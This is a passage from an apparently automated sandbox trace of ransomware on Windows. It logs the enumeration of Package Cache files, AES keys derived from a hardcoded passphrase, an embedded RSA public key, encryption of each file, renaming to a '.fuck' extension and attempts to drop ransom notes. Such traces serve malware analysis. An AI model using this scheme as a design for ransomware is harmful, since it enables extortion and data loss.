WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f1b08, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.782] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.782] CryptEncrypt (in: hKey=0x28e7878, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.782] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.782] CloseHandle (hObject=0xffffffff) returned 1 [0240.782] CloseHandle (hObject=0xffffffff) returned 1 [0240.782] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), bFailIfExists=0) returned 0 [0240.782] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x0) returned 0 [0240.783] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg")) returned 0 [0240.783] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.fuck" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.fuck")) returned 0 [0240.784] CryptDestroyHash (hHash=0x28e7738) returned 1 [0240.784] CryptDestroyKey (hKey=0x28e7878) returned 1 [0240.784] CryptReleaseContext (hProv=0x28f16c8, dwFlags=0x0) returned 1 [0240.784] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.784] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.784] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\readme_back_files.htm")) returned 0xffffffff [0240.784] AreFileApisANSI () returned 1 [0240.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28dbc20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 141 [0240.784] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.785] GetLastError () returned 0x5 [0240.785] GetLastError () returned 0x5 [0240.785] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.785] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.785] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\readme_back_files.htm")) returned 0xffffffff [0240.785] AreFileApisANSI () returned 1 [0240.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0240.785] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.786] GetLastError () returned 0x5 [0240.786] GetLastError () returned 0x5 [0240.786] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.786] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.786] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\readme_back_files.htm")) returned 0xffffffff [0240.786] AreFileApisANSI () returned 1 [0240.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0240.786] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.787] GetLastError () returned 0x5 [0240.787] GetLastError () returned 0x5 [0240.787] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.787] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e8638 [0240.787] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.788] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.788] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8578 [0240.788] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.788] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.788] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e84f8 [0240.788] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.789] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.789] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.789] GetLastError () returned 0x5 [0240.789] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab")) returned 0x20 [0240.789] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0240.790] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.790] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.790] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0240.791] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f1b90) returned 1 [0240.794] CryptCreateHash (in: hProv=0x28f1b90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.794] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.794] CryptHashData (hHash=0x28e7238, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.795] CryptDeriveKey (in: hProv=0x28f1b90, Algid=0x6610, hBaseData=0x28e7238, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e72f8) returned 1 [0240.795] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.795] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.795] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f1860) returned 1 [0240.795] CryptImportPublicKeyInfo (in: hCryptProv=0x28f1860, dwCertEncodingType=0x1, pInfo=0x2905f78*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2905fa8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905fb0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e78b8) returned 1 [0240.795] CryptEncrypt (in: hKey=0x28e78b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.796] CryptEncrypt (in: hKey=0x28e78b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f18e8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f18e8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.796] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f18e8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.796] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.796] CryptEncrypt (in: hKey=0x28e72f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.796] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.796] CloseHandle (hObject=0xffffffff) returned 1 [0240.796] CloseHandle (hObject=0xffffffff) returned 1 [0240.796] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab"), bFailIfExists=0) returned 0 [0240.797] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x0) returned 0 [0240.797] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg")) returned 0 [0240.797] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\cab1.cab.fuck" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\cab1.cab.fuck")) returned 0 [0240.798] CryptDestroyHash (hHash=0x28e7238) returned 1 [0240.798] CryptDestroyKey (hKey=0x28e72f8) returned 1 [0240.798] CryptReleaseContext (hProv=0x28f1b90, dwFlags=0x0) returned 1 [0240.798] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.798] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.799] GetLastError () returned 0x5 [0240.799] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi")) returned 0x20 [0240.799] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", dwFileAttributes=0x80) returned 0 [0240.799] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.800] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.800] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg", dwFileAttributes=0x2) returned 0 [0240.801] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f1b90) returned 1 [0240.803] CryptCreateHash (in: hProv=0x28f1b90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.803] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.804] CryptHashData (hHash=0x28e7a38, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.804] CryptDeriveKey (in: hProv=0x28f1b90, Algid=0x6610, hBaseData=0x28e7a38, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e75b8) returned 1 [0240.804] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.804] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.804] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f0c28) returned 1 [0240.804] CryptImportPublicKeyInfo (in: hCryptProv=0x28f0c28, dwCertEncodingType=0x1, pInfo=0x2905828*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2905858*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905860*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e79f8) returned 1 [0240.804] CryptEncrypt (in: hKey=0x28e79f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.804] CryptEncrypt (in: hKey=0x28e79f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f0f58*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f0f58*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.805] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f0f58, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.805] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.805] CryptEncrypt (in: hKey=0x28e75b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.805] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.805] CloseHandle (hObject=0xffffffff) returned 1 [0240.805] CloseHandle (hObject=0xffffffff) returned 1 [0240.805] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), bFailIfExists=0) returned 0 [0240.805] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", dwFileAttributes=0x0) returned 0 [0240.806] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg")) returned 0 [0240.806] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.fuck" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.fuck")) returned 0 [0240.807] CryptDestroyHash (hHash=0x28e7a38) returned 1 [0240.807] CryptDestroyKey (hKey=0x28e75b8) returned 1 [0240.807] CryptReleaseContext (hProv=0x28f1b90, dwFlags=0x0) returned 1 [0240.807] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.807] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.807] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\readme_back_files.htm")) returned 0xffffffff [0240.807] AreFileApisANSI () returned 1 [0240.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28db3d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 136 [0240.807] CreateFileW 